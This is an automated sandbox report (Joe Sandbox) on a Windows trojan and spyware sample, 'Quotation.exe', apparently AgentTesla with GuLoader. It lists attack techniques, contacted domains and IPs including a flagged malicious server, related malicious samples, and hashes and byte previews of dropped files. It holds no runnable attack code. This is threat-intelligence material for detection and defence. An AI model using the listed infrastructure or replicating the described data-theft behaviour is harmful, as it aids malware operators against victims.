            Process Injection
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Quotation.exe39%ReversingLabsWin32.Trojan.Nemesis
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsbDE39.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://showpiece.trillennium.biz0%Avira URL Cloudsafe
            http://mail.showpiece.trillennium.biz0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.18.14
            truefalse
              high
              drive.usercontent.google.com
              142.250.184.225
              truefalse
                high
                api.ipify.org
                172.67.74.152
                truefalse
                  high
                  showpiece.trillennium.biz
                  67.23.226.139
                  truetrue
                    unknown
                    mail.showpiece.trillennium.biz
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://showpiece.trillennium.bizQuotation.exe, 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.comQuotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://api.ipify.orgQuotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://r11.o.lencr.org0#Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://drive.usercontent.google.com/$KQuotation.exe, 00000009.00000002.2499184774.0000000004CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://mail.showpiece.trillennium.bizQuotation.exe, 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://drive.google.com/Quotation.exe, 00000009.00000002.2499184774.0000000004C38000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://x1.c.lencr.org/0Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://x1.i.lencr.org/0Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://x1.i.lencr.org/03Quotation.exe, 00000009.00000002.2519704345.0000000037219000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.usercontent.google.com/Quotation.exe, 00000009.00000002.2499184774.0000000004CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://apis.google.comQuotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://nsis.sf.net/NSIS_Error...Quotation.exefalse
                                              high
                                              https://api.ipify.org/tQuotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://r11.i.lencr.org/0Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    67.23.226.139
                                                    showpiece.trillennium.bizUnited States
                                                    33182DIMENOCUStrue
                                                    172.217.18.14
                                                    drive.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    142.250.184.225
                                                    drive.usercontent.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    172.67.74.152
                                                    api.ipify.orgUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1549339
                                                    Start date and time:2024-11-05 15:06:08 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 10s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:14
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Quotation.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@3/12@5/4
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 80%
                                                    • Number of executed functions: 72
                                                    • Number of non-executed functions: 17
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: Quotation.exe
                                                    TimeTypeDescription
                                                    10:51:43API Interceptor33109x Sleep call for process: Quotation.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    67.23.226.139COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                        Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            Revised PI 28 08 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                              PI 22_8_2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                COTIZACION 19 08 24.exeGet hashmaliciousAgentTeslaBrowse
                                                                  pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                    invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                      SijLVTsunN.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        172.67.74.1522b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                        • api.ipify.org/
                                                                        Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                                        • api.ipify.org/
                                                                        67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                        • api.ipify.org/
                                                                        Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                        • api.ipify.org/
                                                                        4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                                        • api.ipify.org/
                                                                        y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                        • api.ipify.org/
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        api.ipify.orgb9Mm2hq1pU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 104.26.13.205
                                                                        https://mlflegal.sharefile.com/public/share/web-s929b2bfc135a4aadb68ad5b8c7324a2eGet hashmaliciousUnknownBrowse
                                                                        • 172.67.74.152
                                                                        Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                        • 104.26.12.205
                                                                        COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 104.26.12.205
                                                                        REVISED PO NO.8389.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.13.205
                                                                        https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                        • 104.26.12.205
                                                                        Shipping documents.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 172.67.74.152
                                                                        DB_DHL_AWB_001833022AD.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        Payslip_October_2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.12.205
                                                                        CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                        • 104.26.13.205
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        DIMENOCUSCOTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 67.23.226.139
                                                                        Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 67.23.226.139
                                                                        Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 67.23.226.139
                                                                        Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 67.23.226.139
                                                                        https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.brGet hashmaliciousHTMLPhisherBrowse
                                                                        • 107.161.183.172
                                                                        http://prabal-gupta-lcatterton-com.athuselevadores.com.br/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 107.161.183.172
                                                                        nklarm7.elfGet hashmaliciousUnknownBrowse
                                                                        • 109.73.163.173
                                                                        rtransferencia-.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 138.128.178.242
                                                                        bin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 98.142.105.97
                                                                        https://docsend.com/view/63jvhxyyj7pwxergGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                        • 64.37.50.172
                                                                        CLOUDFLARENETUS09Iz0ja549.exeGet hashmaliciousFormBookBrowse
                                                                        • 188.114.96.3
                                                                        RFQABCO004806L____________________pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWormBrowse
                                                                        • 104.21.5.155
                                                                        En88bvC0fc.exeGet hashmaliciousFormBookBrowse
                                                                        • 172.67.153.83
                                                                        Employee bonus and payroll 74ae5652.pdfGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                        • 188.114.96.3
                                                                        nCYUA8nqsg.exeGet hashmaliciousFormBookBrowse
                                                                        • 188.114.96.3
                                                                        mBms4I508x.exeGet hashmaliciousFormBookBrowse
                                                                        • 104.21.15.203
                                                                        POP (2).pdfGet hashmaliciousUnknownBrowse
                                                                        • 162.159.61.3
                                                                        http://kra13.meGet hashmaliciousUnknownBrowse
                                                                        • 104.21.51.34
                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                        • 172.67.133.135
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0eRFQABCO004806L____________________pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 172.67.74.152
                                                                        b9Mm2hq1pU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 172.67.74.152
                                                                        file.exeGet hashmaliciousLummaC, XWormBrowse
                                                                        • 172.67.74.152
                                                                        Scan- 00399905 Payment slip.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.74.152
                                                                        1q4pQ8ms4w.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.74.152
                                                                        dZJo0ZAVUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.74.152
                                                                        COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 172.67.74.152
                                                                        3Ri17T8XLh.exeGet hashmaliciousXWormBrowse
                                                                        • 172.67.74.152
                                                                        TEKJ09876545678002.cmd.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.74.152
                                                                        REVISED PO NO.8389.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        37f463bf4616ecd445d4a1937da06e19ImDbHt7AA4.exeGet hashmaliciousDarkCloudBrowse
                                                                        • 142.250.184.225
                                                                        • 172.217.18.14
                                                                        COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 142.250.184.225
                                                                        • 172.217.18.14
                                                                        HATCH COVER REQ_AW24 New Order Request.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 142.250.184.225
                                                                        • 172.217.18.14
                                                                        EL GINER.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 142.250.184.225
                                                                        • 172.217.18.14
                                                                        rFactura02Presupuesto_9209Urbia_pdf_.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 142.250.184.225
                                                                        • 172.217.18.14
                                                                        MSI18A.dllGet hashmaliciousUnknownBrowse
                                                                        • 142.250.184.225
                                                                        • 172.217.18.14
                                                                        z120X20SO__UK__EKMELAMA.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                        • 142.250.184.225
                                                                        • 172.217.18.14
                                                                        Request for quotation for the pumps.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 142.250.184.225
                                                                        • 172.217.18.14
                                                                        PerceivedFurthermore.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 142.250.184.225
                                                                        • 172.217.18.14
                                                                        build.exeGet hashmaliciousStealc, VidarBrowse
                                                                        • 142.250.184.225
                                                                        • 172.217.18.14
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Users\user\AppData\Local\Temp\nsbDE39.tmp\System.dllCOTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                            1364. 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                              Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                Quote_220072.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          PO-000172483 (2).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:modified
                                                                                            Size (bytes):12288
                                                                                            Entropy (8bit):5.97694153396788
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:acA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:RR7SrtTv53tdtTgwF4SQbGPX36wJMw
                                                                                            MD5:D6F54D2CEFDF58836805796F55BFC846
                                                                                            SHA1:B980ADDC1A755B968DD5799179D3B4F1C2DE9D2D
                                                                                            SHA-256:F917AEF484D1FBB4D723B2E2D3045CB6F5F664E61FBB3D5C577BD1C215DE55D9
                                                                                            SHA-512:CE67DA936A93D46EF7E81ABC8276787C82FD844C03630BA18AFC3528C7E420C3228BFE82AEDA083BB719F2D1314AFAE913362ABD1E220CB364606519690D45DB
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: COTIZACION.exe, Detection: malicious, Browse
                                                                                            • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                            • Filename: 1364. 2024.exe, Detection: malicious, Browse
                                                                                            • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                            • Filename: Quote_220072.exe, Detection: malicious, Browse
                                                                                            • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                            • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                            • Filename: PO-000172483.exe, Detection: malicious, Browse
                                                                                            • Filename: PO-000172483.exe, Detection: malicious, Browse
                                                                                            • Filename: PO-000172483 (2).exe, Detection: malicious, Browse
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.]!..]!..]!...T..Z!...Y..Z!..]!..I!...T..Y!...T..\!...T..\!...T..\!..Rich]!..................PE..L.....*c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):35
                                                                                            Entropy (8bit):4.264578373902383
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:apWPWPjNLCNHiy:UPRCNHiy
                                                                                            MD5:58AC0B5E1D49D0EE1AED2FE13FAE6C7A
                                                                                            SHA1:02C8384573D47CA39F2E2ACA32B275861EC59A93
                                                                                            SHA-256:624F49944CB84ED51FECABCD549AE3B47152F9A20C4A95E93C8B007AEFE9FEAB
                                                                                            SHA-512:8F5F062D6EBB8312DA4AD4F5AF077B1EAA2E14244823F15E6A87A9E48C7172CC1EA5AB691D3B4F9D8F8E0605F9CB3AA06590B4389820DA531633D9915B988FFC
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:[broadspread]..slyngvrk=houghband..
                                                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):482519
                                                                                            Entropy (8bit):1.2446382063037653
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:+yiLw81PnsncGiIsTVODPOqNbsVEVWZkZA4:G/Pne9iIyVODPsVpZkZA4
                                                                                            MD5:1D099F6122F4B7C8A78925726B59E5C3
                                                                                            SHA1:EEA154E31FF04CD1A2CED0193F7633ED219CFA47
                                                                                            SHA-256:1B6DC1EAD079DB05B998725B154E803E6E1504E7E5B49C5611D55E018CD45E6D
                                                                                            SHA-512:F31F0A285C5A6EB2236CCD49A8BF939E46624F270E0270FC4C5640B37684BC1C7780C5350F778DA8E9D0B8CD25320C1909A9CD937F15BB3A7CDDBCEEE94C47FB
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:.....................................FP.l...........-...............#............W.............a...............3..........1..i.k.............;......H.............................2..............X..H.....}..................................................M.........M........................................................8......_............8....................................................................?...................................................................................J..............................................T.....................................................B..........................7.....................4........o..P................!........................................................................q..........................................................................l............................;...................................q...............................g.......mm......................................n.......................P.........
                                                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):351137
                                                                                            Entropy (8bit):7.676102619266156
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:PdJiCE/E9q19n90UdvyMJsOKp1CJ/VNMaiC05MHhrRkwjJjK5U:PLh4vJOg7KZp1CJ/ti752hrRjOW
                                                                                            MD5:153D8E26703DB4537452788634D68F3A
                                                                                            SHA1:4583B70F72FB96E9A9FB0EEB265004F78B0D3DD6
                                                                                            SHA-256:A63DBF74F1BBFF5707AEB80ED80DED99B4E83878D78E9E2970DF9E0ED0E8B76E
                                                                                            SHA-512:B785A175A3485A621C1623E3E1CE4D08469ABCA14CF1159D06C0E7ADAC3A12E1632A055A67A259A65E280B7A5F012AEB4DF544C96B8E7B54301E2B850F4C58A8
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:..............r."..............ll............S......U.....................uu...;.........G....GG....................................TT............rr.e...........@.....V.............==..hhh...........q...f.......................J............!...:............j....&U.G]..<~.....t.o.>.?vX._.....K....dJ..........C...*..{}u.Df..^[.x.].g...b.j..LM..;.&.6...e..!..".H....@.W.5..S........0G.....s.+.h...).O.....3..Z.N..w.......r.V..oV,......`...\c..9..F..T....0...|....(.z.R..i..Q..-........."..#....l.%.aR....m..C.p.....4...A....f..-ph...8...YkyP...JU.G]..<~.....t.o.>.?vX._.....e.t...f....@..K....dJ...*..{}u.Df..^[.x.].g...b.j..LM..;.&.6...e..!..".....s.l..H....@.W.5..S{G.....s.+.h.f.......>.).O.....3..Z.N..w.......r.Vs`...\c..9..F..T....0...|.......1.......(.z.R..i..Q..-.1..#.......^....a..-.%.aR....m..C.p.....4...Anph...8...YkyP...J!....f.g..).G]..<~.....t.o.>.?vX._.....K....dJ.....b.......!..{}u.Df..^[.x.].g...b.j..LM..........$.&.6...e..!..".H...
                                                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):288955
                                                                                            Entropy (8bit):1.2577770955280814
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:l1SkOmjqFRV/HZzy6+19kZBH4YVHCdJS7G5iOUEEaXXLlgHHl7MRY9hN+418WPK5:KOqvBJzC5vBhp8KT9AGCbQTZkkR
                                                                                            MD5:0B62328C4966F6B879B3C13B7FBD9C0D
                                                                                            SHA1:6DD81F12E739E81E06778067513ED1178A06AFC9
                                                                                            SHA-256:645C325F62AF720972466322B09A7E396E46D8E640B138D582374B68D763A3A7
                                                                                            SHA-512:2F738A2950352F124F7B969D38B52BD2E4453FF42BC8DEB7566620E6CDEA30368A6DC16230BA49050F8C0327175CAB71DC4A1709541F08A3FFDCF55FAF5B75B8
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:.........................................s.............i.......................................A.........................4.......;........i................................................_........................-.&..............................+..........................................................8.............................................?....U........................................................~........g... .....?...............................................................f............................S..................................!...........................j.............m....g....................................(............................z....d..........z..........^...............s...........................H............................t..........A.....................|............................................................[.................................................\.......................v...........o...................................m...........
                                                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):149734
                                                                                            Entropy (8bit):4.624147867948753
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:YlQkdicTlaY9bRNq/yW2AmPCeRWOUUdr+jHH:8Qkdi4llG/yW+7QB7
                                                                                            MD5:5AFE09B3AEF2B87007D437EA12C40C5A
                                                                                            SHA1:32C89636169419C6C84C9E8AE4BEB0575E2A60A1
                                                                                            SHA-256:700B075118B5B9F6B87F91D93737846483BFAE61ABB562454AE416B246C7792F
                                                                                            SHA-512:B2B5D8C1AC33EB3E2D0F67B475E1027D84EEDB794BBC3EA765ABADD528CD166861C87AB72E56B197D994C90BB65CB194A28BFC03795BEBC0591F667BC0EDC547
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:.........`......55.<.................ff.......]............X....^^^^..oo...))...............................................2..........qq.........ZZ..........@..............M...........A................GG.........\\\\\\.)))............bb..................3.....eeee..........''''...............v.......U...f.^.''..........Q.....llllll................bb..............UU..g.................<....7.................g..J...]...VVVV...............zzz...-....U..r.............OOO...........22.$.2..............GG.................7...........*..G......|||..............................p..v.............,....."....77777...rr....D...AAAAA.........2..&....M.......FF.......T...ddd.......D....>..iiii................&&.......I.....S.uuu........................................00..............................5.kk............2..............=.???.....................i.....66........XXX..eeee................xxxxxx..\..............\......................................K..........."".....J............oo......[[[.
                                                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):340974
                                                                                            Entropy (8bit):1.254605943274635
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:AgVdAd1etxyZmQhZgJwrQTTwKuiTGrJqCoIEsPkZnFFSKsOI4v/3n35lB3LiADa4:5TxLsV5IjQ3xx12
                                                                                            MD5:49BE0E06F2E4F0CCFFB46426EE262642
                                                                                            SHA1:FF9C56C31A824E4CA087705C23D01D288FE34239
                                                                                            SHA-256:A55DAC07FB586D4B64F0DDF812087A2EEEC6F5286D9BC73AD648ED3220ABDD3A
                                                                                            SHA-512:27E9D035708943DD257186457C15488C9405747FC77F7C76760C96EE011C239F9FA53B5DA17958038FB2BA1C4E27E643E7924A37E6164E250B9F45A109D92E53
                                                                                            Malicious:false
                                                                                            Preview:.....................................n.........A...5............K.................C.........a............>....................................................................................p...................................................................................................................W.......................................m.........................................M..........................'......i.............................................................................................4....................................}....................................................................................................................................................x...........S..................'..y............................................../..........................................M..................Z.................................V.......................................=.....N...............................n..................................|. .....
                                                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):392462
                                                                                            Entropy (8bit):1.241128723454179
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:jby0EUrStmwpKcx/orVcYZ+M3ok1I7vZFCDrlv2UV5t3votN6cGia46OGj3OkYSk:FaZaukRTadSdbrJ5N275Ea3nRYS3r
                                                                                            MD5:F130EC3095DBECEDC791D8C58A59040C
                                                                                            SHA1:DAD2300B487F31F199520E1B41AB02B7D677B352
                                                                                            SHA-256:A56351ED69A301F5D9D89B6530280B7A85F998A806E1648911C37B6983BA9426
                                                                                            SHA-512:8599200F472F2D59390E8F2C497331640B12AB9FAF71817160C6D450EDF8A99F78CEF28CC3B57581D6AECFC1EC90A49947A6685C606321B6EE300D483C838360
                                                                                            Malicious:false
                                                                                            Preview:..................J......-..............K....e..........1......................D....................................?............K.V..............................................\....3.......................................L.................................A.........i........,...........................P.{............................................................r................................................V........................................e............&.................................................7...................k.........<...s................).................................................x...............................j................................`.................b.................G.......w..........................................{.........................................G..............................:.................#..............................................<..O......^..........O..............................7..\................................
                                                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):433786
                                                                                            Entropy (8bit):1.255949132332751
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:NFXORpsqJLOaVDzzoIgUPRGRoYNxHVxyczaUz4pP9Nom56I4tY6UBh1Yc88LaAQo:TUAoYxPzqoIzdwWR1+/24cwZXeCPiIBo
                                                                                            MD5:53FF1A157920AE92C9BF891D453D6B65
                                                                                            SHA1:B7BF3B7B16048F38132D8ACCA841130D73DB44C3
                                                                                            SHA-256:FAD1B5E641DC44B5A51048470D4E0FB47664CF2B994CEA24304495D99323B9DE
                                                                                            SHA-512:E739381C24627F89255DB55B2DA39A09F055A322C577C3604BA048FB2C817AE7F63B12131F8461491F6140953FB33DD94EB66D8CB3B13B36717143342CE270AF
                                                                                            Malicious:false
                                                                                            Preview:......................................j......................................."t......... .............Z..........................................+...o..G.......d......................................................................................X................5....................................F.........'.....................................................U...............................\............Y............)..............................d..D....................................................%.................................................Y..#.......................................................................................................................^.........................................j...........w...............................................n.....................................V..........i.............................................6...7..........*.........................................................................H.............................
                                                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):374902
                                                                                            Entropy (8bit):1.250991222921627
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:XkYzjcLYszRzU5n1C900tMkYQx+gnpovYHO:XkYz4DzQB5sYYH
                                                                                            MD5:169115C751DDA5E021E8C86E8454B26D
                                                                                            SHA1:5A8254634C0C726BB18E42E626EAEB581D532DCD
                                                                                            SHA-256:ACCD4911D88E808AED4A2AA27394628C62574810B0B47977B7103A246FDF2A10
